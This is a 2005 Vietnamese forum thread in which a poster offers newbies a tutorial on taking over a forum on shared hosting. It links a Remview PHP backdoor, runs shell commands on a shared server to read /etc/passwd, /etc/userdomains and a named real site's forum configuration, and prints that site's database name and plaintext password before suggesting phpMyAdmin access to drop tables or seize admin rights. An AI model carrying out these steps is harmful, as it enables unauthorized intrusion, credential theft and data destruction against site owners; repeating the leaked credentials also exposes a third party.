New articles Năng lực quản lý: nhân tố thứ năm     ♥ Lựa chọn mục tiêu cuộc đời     ♥ 10 bí quyết cân bằng công việc và gia đình     ♥ Cô đơn trên mạng     ♥ Chứng khoán: Giấc mơ và ác mộng     ♥ Tám     ♥ Những tính năng của blog VnVista     ♥ Các mạng xã hội thống trị Google     ♥ Điều gì tạo nên một giám đốc công nghệ thông tin giỏi?     ♥ Cố gắng xóa bỏ những ấn tượng xấu     ♥ Cần một cách làm ăn mới     ♥ Tiếp thị hướng đến doanh nhân     ♥ Đưa cửa hàng thật lên chợ ảo     ♥ Bí quyết quản lý các nhân viên trẻ     ♥ Một số câu hỏi phỏng vấn “đặc biệt” của Microsoft     ♥ 4 bài học thành công trong kinh doanh     ♥ Tạo dựng hình ảnh một cô gái trẻ chuyên nghiệp     ♥ Góc “khác” của thế giới online đêm     ♥ Phong cách người Mỹ     ♥ Chỉ nghĩ đến tiền cũng làm người ta ích kỷ     
New blog entries #10 đơn vị thi công chống nóng Hà Nội      ♥ Xét nghiệm Gene Xpert là gì? Quy trình thực hiện      ♥ Lợi ích khi sử dụng máy khuấy 100-200 lít      ♥ QUY TRÌNH HÚT MỠ BẮP TAY KHÔNG PHẪU THUẬT      ♥ Tủ dụng cụ 9 ngăn chia khay sơn tĩnh điện      ♥ 8 Nguyên nhân quảng cáo TikTok không duyệt [Update      ♥ QUY TRÌNH HÚT MỠ TOÀN THÂN AN TOÀN NHƯ THẾ NÀO?      ♥ 5 mẹo giúp thông tắc bồn cầu      ♥ Xem phong thủy bậc tam cấp      ♥ Thực trạng ô nhiễm nguồn nước      ♥ Ô nhiễm ánh sáng      ♥ BAO NHIÊU TUỔI THÌ HÚT MỠ ĐƯỢC?      ♥ Sửa tivi Sony tại Hải Phòng      ♥ SP2煙彈哪裡買      ♥ Iqos可以帶回台灣嗎      ♥ Quy định thiết kế nhà vệ sinh      ♥ ファクタリング 大手      ♥ Lo Lắng Mất Xe? Bộ Định Vị JABLOTRON CU-08A!      ♥ Làm lông mày có cần xem tướng không      ♥ Quy định thiết kế nhà vệ sinh      
 
Reply to this topicStart new topicStart Poll

Liệt Kê · [ Bình Thường ] · Tách Biệt+

Đoạt quyền admin trong phpmyadmin, From HVA


Venus
post Sep 14 2005, 11:17 PM
Gửi vào: #1
No avartar

Group Icon

Thực tập viên
*
Thành viên: 136
Nhập: 14-September 05
Bài viết: 3
Tiền mặt: 26
Thanked: 0
Cấp bậc: 1
------
Giới tính: Male
------
Bạn bè: 0
Thêm vào nhóm bạn bè
Gửi thiệp điện tử
Trang thông tin





Tác giả: Kid_ktv4

Chào các bạn , hôm nay mình xin giới thiệu 1 cách hack forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie
Ở đây tôi lấy 1 site vd www.forums.ngoisaonho.info site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu www.checkdomain.com bạn có thể dùng nó ! chúng ta tiếp tục nhé

Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim . Tôi dùng remview bạn dùng cái gì thì tuỳ
copy đoạn code remview.php
down tại http://www.ktv4vn.com/rem.zip

Bước 2
okie ! up con backdoor này lên host của bạn và chạy nó với link http://www.localhost.com/remview.php
Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
okie trong Shell commands bạn cho run lệnh


CODE
cat /etc/passwd;


Tốt rồi


CODE
ngoisaon:x:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell



Tiếp trong shell commands bạn cho run lệnh
cat /etc/userdomains;

Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon


CODE
ngoisaonho.info: ngoisaon



Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:
dir /home/victim/public_html/;
thu được


CODE
cgi-bin index.htm _private _vti_inf.html _vti_txt xoa
diendan music _vti_bin _vti_log wait.gif
forums postinfo.html _vti_cnf _vti_pvt welcome



Chạy tiếp lện dir để view thư mục forums
dir /home/victim/public_html/forums;
thu được


CODE
admin.php fonts MBinstall.php style_images
cache html modules uploads
cgi-bin icon_db_hack.php show.php viewsong.php
conf_global.php index.php Skin xoa
conf_mime_types.php install_templates.txt sources
css.php ipchat.php ssi.php
datamusic.sql lang ssi_templates



Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
cat /home/victim/public_html/forums/conf_global.php;


CODE
$INFO['sql_database'] = 'ngoisaon_Forums';
$INFO['sql_driver'] = 'mySQL';
$INFO['sql_host'] = 'localhost';
$INFO['sql_pass'] = 'HANOIMUATHU';



Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị hack pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này vì tính chất nguy hiểm mình xin ngừng bút tại đây chừa 1 chút khoảng chống để bạn tự tìm hiểu và làm cái gì đó cao siêu hơn nữa , chúc hack vui vẻ thân kid_ktv4 tái bút


--------------------
Nhóm bạn bè:

Thành viên này chưa có người bạn nào trong mạng VnVista, nếu bạn muốn trở thành người bạn đầu tiên của thành viên này, hãy click vào đây


Cảnh cáo: (0%)----- 
Nếu bạn thấy bài viết này vi phạm nội quy forum, hãy click nút này:
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

Thank you ^_^
post Nov 17 2005, 09:24 PM
Gửi vào: #2


Group Icon

..::| Xin cảm un |::..
*********
Thành viên: 263
Nhập: 21-October 05
Bài viết: 1,313
Tiền mặt: 1
Thanked: 0
Cấp bậc: 31
------
Giới tính: Female
Đến từ: VnVista
------
Bạn bè: 0
Thêm vào nhóm bạn bè
Gửi thiệp điện tử
Trang thông tin





1 thành viên đã cảm ơn bạn:
Thần_Điêu


--------------------
Nhóm bạn bè:

Thành viên này chưa có người bạn nào trong mạng VnVista, nếu bạn muốn trở thành người bạn đầu tiên của thành viên này, hãy click vào đây


--------------------
user posted image


Cảnh cáo: (0%)----- 
Nếu bạn thấy bài viết này vi phạm nội quy forum, hãy click nút này:
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

tiamo
post Nov 18 2005, 10:00 PM
Gửi vào: #3
No avartar

Group Icon

Thực tập viên
*
Thành viên: 446
Nhập: 9-November 05
Bài viết: 3
Tiền mặt: 18
Thanked: 0
Cấp bậc: 1
------
Giới tính: Female
Đến từ: Cần Thơ
------
Xem blog
Bạn bè: 0
Thêm vào nhóm bạn bè
Gửi thiệp điện tử
Trang thông tin





Được không vậy!


--------------------
Nhóm bạn bè:

Thành viên này chưa có người bạn nào trong mạng VnVista, nếu bạn muốn trở thành người bạn đầu tiên của thành viên này, hãy click vào đây


--------------------
Hãy sống như ngày mai bạn chết


Cảnh cáo: (0%)----- 
Nếu bạn thấy bài viết này vi phạm nội quy forum, hãy click nút này:
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

Thank you! Reply to this topicTopic OptionsStart new topic
 

Bản Rút Gọn Bây giờ là: 29th March 2024 - 10:09 PM
Home | Mạng xã hội | Blog | Thiệp điện tử | Tìm kiếm | Thành viên | Sổ lịch | Xem phim online chất lượng cao